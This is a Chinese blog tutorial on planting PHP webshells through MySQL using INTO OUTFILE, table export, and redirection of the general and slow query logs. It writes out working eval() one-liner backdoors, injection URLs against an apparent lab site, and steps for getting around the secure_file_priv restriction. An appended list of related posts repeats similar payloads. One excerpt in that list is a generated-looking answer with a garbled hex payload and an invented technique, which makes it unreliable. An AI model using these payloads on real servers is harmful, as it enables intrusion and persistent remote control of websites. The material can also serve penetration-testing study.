通过MySQL写入webshell的几种方式(小宇特详解)

最新推荐文章于 2023-10-23 11:37:26 发布
最新推荐文章于 2023-10-23 11:37:26 发布
阅读量5.6k 收藏 14
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhy18634297976/article/details/119486812
版权

通过MySQL写入webshell的几种方式

-01-通过outfile写入shell

利用条件

1.root权限2.网站的绝对路径且具有写入权限,能够使用into outfile和into dumpfile来进行写入。

这里用了以下的shell

union select 1,"<?php eval($_REQUEST[8])?>" into outfile 'C:/phpStudy/WWW/4448.php'

在这里插入图片描述

这里连接蚁剑
在这里插入图片描述

-02-将shell写入表中

利用条件

1.root权限2.网站的绝对路径且具有写入权限。

先运行,生成表

http://afsgr16-b1ferw.aqlab.cn/?id=1 union select 1,insert into 'sxss'('comment') values ('<?php  @eval($_POST[1]);?>');

查询该数据表,将结果导出文件

select comment from sxss into outfile 'C:/phpStudy/WWW/4449.php';

-03-开启全局日志写入shell

利用条件

1.root权限2.网站的绝对路径且具有写入权限

查看全局日志配置

show variables like '%general%';

开启全局配置

set global general_log = on;

将日志文件设置成服务器下的木马文件

set global general_log_file = 'C:/phpStudy/WWW/4449.php'

然后执行sql语句,mysql会将我没执行的语句记录到日志文件(上一步修改后的文件)中

select '<?php  @eval($_POST[1]);?>';

-04-慢查询日志写入shell

在实际写webshell的时候,我们经常会遭受到secure_file_priv的阻拦,secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用,其参数值有以下三种:

1、NULL:表示不允许导入导出

2、目录地址,如/tmp/:表示只能对指定目录进行导入导出,如/tmp/

3、空,即没有具体值:表示不对导入导出做限制

可使用如下命令来查看secure_file_priv的值:

show global variables like '%secure%';

在高版本的mysql中默认为NULL,就是不让导入和导出

解决办法:

在Windows下可在my.ini的[mysqld]里面,添加secure_file_priv=

在linux下可在/etc/my.cnf的[mysqld]里面,添加secure_file_priv=

使用慢查询日志绕过此限制

利用条件:

1、root权限2、网站的绝对路径且具有写入权限执行如下语句写入shell:

查看慢查询日志开启情况

show variables like '%slow_query_log%';

开启慢查询日志

set global slow_query_log=1;

修改日志文件存储的绝对路径

set global slow_query_log_file='C:/phpStudy/WWW/4449.php';

向日志文件中写入shellselect

'<?php @eval($_POST[1]);?>' or sleep(11);

使用慢查询日志时,只有当查询时间超过系统时间(默认为10秒)时才会记录在日志中,使用如下语句可查看系统时间:

show global variables like '%long_query_time%';
小宇特详解
关注
MySQL数据库写入webshell
weixin_45253622的博客
03-24 944
MySQL数据库写入webshell 判断 前提条件: 数据库当前用户为root权限 知道当前网站的绝对路径 PHP的GPC为OFF状态 写入的那个路径存在写入权限 注意点: secure_file_priv参数 这个参数用来限制数据导入和导出操作的效果,例如执行LOAD DATA、SELECT … INTO OUTFILE语句和LOAD_FILE()函数。 如果这个参数为空,这个变量没有效果。 如果这个参数设为一个目录名,MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在,M
第01篇:MySQL注入点WebShell的5种方式1
08-03
本文将探讨如何利用MySQL注入点写入WebShell的五种方法,重点关注条件和具体步骤。 首先,确保存在一个可利用的MySQL注入点至关重要。这通常发生在应用程序的输入验证不足,使得攻击者可以插入额外的SQL代码到查询...
MySQL注入之木马上传拿webshell
Jim的博客
08-15 1万+
原理:利用MySQL中的命令into outfile(固定式:select A into outfile B),在目标Web虚拟路径D:/WWW/下面生成一个木马文件  工具:中国菜刀 1.首先查找SQL注入点 使用单引号'报错,使用and 1=1页面正常和and 1=2页面不正常,来判断存在SQL注入 2.使用order by猜测字段数量 ?id=1+order+by+2--+
Mysql写入webshell两种方法总结-- into outfile,导入日志
qq_45730325的博客
05-19 3807
Mysql写入webshell
Mysqlshell几种方式
Redredredfish的博客
08-23 7967
Mysqlshell几种方式 当我们拿到数据库权限时,可通过数据库管理工具写入webshell到目标服务器上,利用webshell控制目标服务器。 复现环境: phpstudy_pro 8.1.0.6 mysql 5.7.26 root权限 网站绝对路径为D:\phpstudy_pro\WWW 利用方式: 通过outfile写入shell 尝试通过outfile写入文件 报错[Code: 1290, SQL State: HY000]The MySQL server is running with
MySQL WebShell总结
Poolhuang的博客
05-27 471
1、写入方式 ①、基于outfile写入 union select 例:?id=1 union select '<?php phpinfo() ?>' into outfile '物理路径' ; ###利用分隔符写入 lines terminated by ::设置每行结尾的字符,可以为单个或多个字符,默认值为‘\n’;可以理解为 以每行终止的位置添加 xx 内容。 例:?id=1 into outfile '物理路径' lines terminated by '<?php .
MySQL注入点写入WebShell几种方式
热门推荐
04-16 2万+
在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。比如:当面对一个MySQL注...
SQL注入webshell
huangyongkang666的博客
03-25 2876
SQL注入webshell 1.MySQLshell 写入WebShell几种方式 1、利用Union select 写入 需要满足的条件 对web目录有权限 GPC关闭(GPC:是否对单引号转义) 有绝对路径(读文件可以不用,文件需要) 没有配置secure-file-priv ?id=1 union select '<?php assert($_POST["cmd"]);?>’ into outfile 'D:/WWW/evil.php' ?id=1 union select
如何通过非数字与字符的方式实现PHP WebShell详解
08-30
在本文中,我们将深入探讨如何通过非数字与字符的方式来实现PHP WebShell,这是一种高级的渗透测试技巧,用于绕过Web应用程序防火墙(WAF)的限制。PHP WebShell是一种恶意脚本,允许攻击者在受感染的服务器上执行...
MySQL注入中导出字段内容的研究通过注入导出WebShell
09-14
MySQL注入中,由于其...总之,虽然MySQL的特性限制了某些类型的攻击,但仍然存在多种方式利用SQL注入导出字段内容或创建WebShell。开发人员应当保持警惕,确保应用程序的安全性,遵循最佳实践来防止这些潜在的威胁。
MySql备份得到WebShell.pdf
10-10
MySql备份得到WebShell.pdf
MySQLShell方法总结
做自己喜欢的事,并将其发挥到极致!
12-31 4824
MySQL注入点,用工具对目标站点写入一句话shell,需要哪些前提条件? **root权限以及网站的绝对路径** outfile 和 dumpfile Shell 利用条件 ·数据库当前用户为root权限 ·知道当前网站的绝对路径 ·PHP的GPC为OFF状态;(魔术引号,GET、POST、COOKIE) `写入的那个路径要有写入权限 过滤了单引号into outfile 还可以用吗 不能,GPC要OFF才行,可以测试Hex编码 基于UNION联合查询 ?id=1 UNION ALL SELECT
MySQL 一句话拿 WebShell
ShadowySpirits的博客
10-03 5143
本文介绍两种利用 MySQL getshell 的方法: select … into outfile general_log 一、select … into outfile 介绍 利用需要满足以下条件: 对web目录有权限 GPC关闭(能使用单引号) 有绝对路径(读文件可以不用,文件必须) 没有配置 –secure-file-priv 姿势: 有 union id=2) union...
渗透测试面试近期热门题
最新发布
wananxuexihu的博客
10-23 140
答:(1)Fastjson是Alibaba开发的Java语言编的高性能JSON库(2)攻击者准备rmi服务和web服务,将rmi绝对路径注入到lookup方法中,受害者JNDI接口会指向攻击者控制rmi服务器,JNDI接口向攻击者控制web服务器远程加载恶意代码,执行构造函数形成RCE(3)fastjson漏洞历史(fastjson接受的JSON可以通过艾特type字段来指定该JSON应当还原成何种类型的对象,在反序列化的时候方便操作)2.fastjson-1.248以下。
mysqlShell小技巧_mysqlshell几种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
06-21 474
1.Mysql数据库支持union的时候文件小技巧: 采用常规的union写入,可以看到前面的字段占位数肯定也会被写入,替换成null也是一样的结果,这个对于shell没啥大碍,mysqlShell小技巧,但是如果用来bat,mof,vbs等文件就会出问题了,那么怎么去掉这个只写入我们需要的内容呢?采用hex编码就好了。
如何向mysql写入wbeshell
ws1813004226的博客
03-23 904
如何向mysql写入wbeshell 一、成功写入wbeshell必须满足的4个条件: (1)数据库拥有root权限或拥有file权限。 (2)知道网站的绝对路径。 (3)PHP的GPC参数为OFF状态。 (4)MYSQL中的secure_file_priv参数不能为NULL。 二、写入方法 1.使用outfile方法。outfile是mysql提供的一个用来写入文件的函数,当我们可以控制写入文件的内容以及文件的保存路径时,我们就可以上传一个webshell。 2.基于日志写入法。将日志文件的导出目录修改成
mysqlshell
weixin_47385895的博客
08-22 1976
mysql常见shell方法
sql注入写入webshell
06-28
### 回答1: SQL注入是一种攻击技术,可以利用应用程序中存在的漏洞,将恶意的SQL代码注入到应用程序中,从而获取应用程序的控制权。如果攻击者成功地注入了SQL代码,他们可以执行任意操作,包括写入WebshellWebshell是一种恶意代码,可以在受攻击的服务器上创建一个远程访问接口,允许攻击者执行任意命令。攻击者可以使用Webshell来窃取敏感数据、破坏系统、或者在服务器上安装其他恶意软件。 要利用SQL注入写入Webshell,攻击者需要找到一个易受攻击的应用程序,并利用应用程序中存在的漏洞注入恶意的SQL代码。一旦注入成功,攻击者可以使用SQL语句来创建一个Webshell文件,并将其写入服务器上的某个目录中。然后,攻击者可以使用Webshell来执行任意命令,包括上传和下载文件、执行系统命令、或者修改文件权限等操作。 为了防止SQL注入攻击,应用程序开发人员应该采取一系列措施,包括使用参数化查询、过滤用户输入、限制数据库用户的权限等。此外,管理员还应该定期检查服务器上的文件和目录,以确保没有Webshell存在。 ### 回答2: 什么是SQL注入? SQL注入是一种攻击方式,用于通过对应用程序中的输入进行恶意注入,从而访问或与应用程序中的数据库进行交互。SQL注入通常利用应用程序的输入验证不严格,以及对数据库中的数据进行不安全的查询和处理,从而访问和操纵数据库。 什么是webshellWebshell是一种特殊的程序代码,可以通过Web接口进行访问和控制,可以给攻击者带来权限最高的系统操作权限。 如何通过SQL注入写入webshell? 攻击者通过SQL注入可以执行许多操作,包括获取或修改数据库中的数据,但更加危险的是可以通过写入webshell来获得对目标系统的完全控制。下面是一些通用的示例,介绍如何通过SQL注入外部攻击者写入webshell。 1. 通过UNICODE编码的方式写入webshell 攻击者可以通过在URL字符串中使用UNICODE编码来伪装恶意SQL注入代码,以此来避开Web应用程序的过滤器和安全防护措施。例如,攻击者可以使用以下语句,将webshell写入到一个包含BLOB类型的表中: ' UNION SELECT NULL, CAST(0x3C3F706870206576616C28245F5053545B312D31293B206966202869736572727065723F246F75745B315D290A7B2473797374656D3D2170737465725F6765745F636F6E74656E74735F75726C28293B2024746578743D2473797374656D5B31293B2073656E64286F62636F645B2272657175657374225D2E6"9"6"5"76616C285F504F53545B225F716"5"56"1"225D293B290A3F3E0A0A, NULL-- 此代码将webshell写入到一个表中,并通过使用PHP代码,能使其在服务器上运行。 2. 在注入点创建一个新表,并将webshell写入其中 攻击者可以通过多个SQL注入绕过过滤和检测,创建一个新的表并将webshell写入其中。例如,下面的代码可以被绕过,从而创建一个新的表: ' UNION SELECT NULL, 'CREATE TABLE webshell (id INT, shell text); INSERT INTO webshell(id, shell) VALUES (1,<?php eval($_POST[0]); ?>);' INTO OUTFILE '/var/www/html/new.txt'-- 此代码创建了一个新表“webshell”,其中包含列“id”和“shell”,并将webshell写入到以BLOB类型存储的“shell”列中。 3. 在目标服务器上创建一个外部表,并将webshell写入其中 攻击者还可以通过创建一个外部表,在连接到目标服务器时抓取webshell。例如,攻击者可以构建以下SQL语句以在目标服务器上创建名为“webshell”的外部表: CREATE TABLE webshell (id INT, shell text); INSERT INTO webshell(id, shell) VALUES (1, '<?php eval($_POST[0]); ?>'); 然后,攻击者可以请求一个可以对此表进行操作的URL: ' UNION SELECT NULL,'/var/www/html/?id=(SELECT GROUP_CONCAT(CONCAT(id,0x2C,shell),0x0A) FROM mysql.external_table WHERE table_name="webshell")' INTO OUTFILE '/var/www/html/output.txt'-- 该URL将在服务器上抓取webshell,并将其输出到/var/www/html/output.txt。攻击者现在可以从该位置获取完整的webshell,以便执行任意系统命令。 总结 SQL注入是一种令人不安的攻击方式,可以使黑客绕过应用程序的安全控制,从而访问和操纵系统中的数据。写入webshell是SQL注入的最危险的结果之一,它允许黑客完全控制目标系统和数据。要保护Web应用程序免受SQL注入和其他攻击的威胁,建议采取一系列安全措施,包括在应用程序代码中实施更强大的输入验证和防御措施,利用Web应用程序防火墙和安全扫描器,以及升级和更新应用程序及其相关软件以减少漏洞和缺陷的风险。 ### 回答3: SQL注入是一种攻击技术,攻击者利用这种技术可以将恶意负载注入到应用程序的数据库中,包括写入webshell,从而获取系统控制权和敏感数据。SQL注入攻击是因为应用程序没有正确的验证用户输入数据而造成的。 SQL注入攻击者通过在应用程序的输入字段中输入特殊字符或语句,从而执行恶意SQL语句来覆盖或篡改应用程序的数据库。攻击者可以利用这个漏洞来写入webshell,从而获取远程访问到受害者的系统。 webshell是一种恶意软件,攻击者可以在受害者的主机上进行远程控制。攻击者可以利用webshell来窃取敏感信息、执行命令、上传或下载文件等操作。 攻击者通常会在注入恶意负载后,通过脚本或工具上传或执行webshell。一旦攻击者成功地写入webshell,他就可以通过浏览器或其他工具来远程控制受害者的系统。 为了防止SQL注入攻击,应用程序必须实施有效的数据验证和过滤,从而限制用户输入的字符和语句。此外,安装和更新防病毒和防火墙软件也是非常重要的。其他防御措施还包括使用安全套接字层(SSL)来加密数据传输,使用预编译语句来包含应用程序的数据查询,以及限制数据库用户的访问权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小宇特详解

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值